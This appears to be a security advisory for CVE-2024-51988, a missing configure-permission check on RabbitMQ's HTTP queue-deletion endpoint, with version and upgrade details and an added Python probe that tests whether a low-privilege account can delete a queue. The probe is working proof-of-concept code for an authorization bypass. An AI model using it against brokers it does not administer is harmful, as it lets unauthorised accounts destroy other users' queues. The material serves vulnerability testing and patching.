PT-2024-35078 · RabbitMQ · Tanzu RabbitMQ

Anhanhnguyen (+1) · Published 2024-11-06 · Updated 2024-11-08

CVE-2024-51988 · CVSS v4.0 7.1 (High)

Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
Name of the Vulnerable Software and Affected Versions

RabbitMQ versions prior to 3.12.11
Tanzu RabbitMQ versions prior to 1.5.2
Tanzu RabbitMQ versions prior to 3.13.0
Tanzu RabbitMQ versions prior to 4.0.0
Description

RabbitMQ is a feature-rich, multi-protocol messaging and streaming broker. In affected versions, the queue deletion handler of the management plugin's HTTP API (DELETE /api/queues/{vhost}/{name}) did not check that the caller held the configure permission for the target queue, which is the permission RabbitMQ's access control model requires for deleting a queue (the AMQP 0-9-1 queue.delete path enforces it; the HTTP API handler did not). Any user with valid credentials, some permission on the target virtual host (for example read or write only), and HTTP API access could therefore delete queues they were not permitted to delete, an integrity impact that the CVSS vector reflects (VI:H). The issue is fixed in version 3.12.11 of the open source RabbitMQ release and in versions 1.5.2, 3.13.0, and 4.0.0 of the Tanzu release.
Recommendations

For RabbitMQ versions prior to 3.12.11, upgrade to version 3.12.11 or later.
For Tanzu RabbitMQ versions prior to 1.5.2, upgrade to version 1.5.2 or later.
For Tanzu RabbitMQ versions prior to 3.13.0, upgrade to version 3.13.0 or later.
For Tanzu RabbitMQ versions prior to 4.0.0, upgrade to version 4.0.0 or later.

As a temporary workaround, disable the management plugin (this removes the HTTP API and the web UI entirely, so only accounts using a messaging protocol remain able to act on queues) and use, for example, Prometheus and Grafana for monitoring. Because the vulnerable path is only reachable by accounts with HTTP API access, the exposure is limited to users who hold that access; the upgrade is the only complete fix.
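The following probe is an added example, not code from the advisory or from the RabbitMQ project. It verifies the authorization gap described above against a broker you own: an admin account declares a throwaway queue, a second account that has been granted read and write but no configure permission on the vhost attempts DELETE /api/queues/{vhost}/{name}, and the admin then checks whether the queue survived. A 204 with the queue gone means the configure check is missing (vulnerable); a 401/403 with the queue intact means the fix is present. The base URL, vhost, account names, passwords and queue name are assumptions for illustration; the rabbitmqctl commands in the docstring show the permission layout the probe expects (configure regex "^$" grants no configure permission, and the management tag grants HTTP API access without administrative rights).

```python
"""Check whether a user WITHOUT configure permission can delete a queue
through the RabbitMQ management HTTP API (CVE-2024-51988).

Assumed setup on the broker under test (example names, not from the advisory):
    rabbitmqctl add_user probe probe-pass
    rabbitmqctl set_user_tags probe management              # HTTP API access only
    rabbitmqctl set_permissions -p / probe "^$" ".*" ".*"   # configure=none, write=all, read=all
"""
import base64
import json
import urllib.error
import urllib.parse
import urllib.request

DENIED = {401, 403}  # the management API answers permission failures with one of these


def queue_url(base_url, vhost, queue):
    """Build /api/queues/{vhost}/{name}. The default vhost "/" must be
    percent-encoded as %2F, otherwise the path is misrouted."""
    return "{}/api/queues/{}/{}".format(
        base_url.rstrip("/"),
        urllib.parse.quote(vhost, safe=""),
        urllib.parse.quote(queue, safe=""),
    )


def basic_auth(user, password):
    """HTTP Basic Authorization header value for the management API."""
    token = base64.b64encode("{}:{}".format(user, password).encode()).decode()
    return "Basic " + token


def classify(delete_status, queue_still_exists):
    """Interpret the DELETE outcome for a caller who lacks configure permission."""
    if delete_status == 204 and not queue_still_exists:
        return "vulnerable"  # deletion succeeded although configure was not granted
    if delete_status in DENIED and queue_still_exists:
        return "fixed"       # permission check present, queue untouched
    return "inconclusive"    # 404 (queue never existed), 5xx, or contradictory state


def _request(method, url, auth, body=None):
    """Send one request and return the HTTP status, including error statuses."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method)
    req.add_header("Authorization", auth)
    req.add_header("Content-Type", "application/json")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def probe(base_url, vhost, admin, low_priv_user, queue="cve-2024-51988-probe"):
    """Run the three-step check; returns (verdict, status of the user's DELETE)."""
    admin_auth = basic_auth(*admin)
    user_auth = basic_auth(*low_priv_user)
    url = queue_url(base_url, vhost, queue)

    # 1. Admin declares the throwaway queue (PUT answers 201 on create, 204 if it exists).
    put_status = _request("PUT", url, admin_auth, {"durable": False, "auto_delete": False})
    if put_status not in (201, 204):
        return "inconclusive", put_status

    # 2. The user without configure permission attempts the delete.
    delete_status = _request("DELETE", url, user_auth)

    # 3. Admin checks whether the queue survived, then cleans up.
    still_exists = _request("GET", url, admin_auth) == 200
    verdict = classify(delete_status, still_exists)
    if still_exists:
        _request("DELETE", url, admin_auth)
    return verdict, delete_status


if __name__ == "__main__":
    # Example invocation against a local broker with the assumed accounts above.
    verdict, status = probe("http://localhost:15672", "/",
                            ("guest", "guest"), ("probe", "probe-pass"))
    print("DELETE by low-privilege user returned {} -> {}".format(status, verdict))
```

Run it only against a broker you administer: the probe creates and deletes a queue under the admin account, and on a vulnerable broker the low-privilege account really does delete it. After applying the fix, the same invocation should report "fixed".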

Weakness Enumeration

Improper Access Control

Related Identifiers

BIT-RABBITMQ-2024-51988
CVE-2024-51988
GHSA-PJ33-75X5-32J4

Affected Products

RabbitMQ
Tanzu RabbitMQ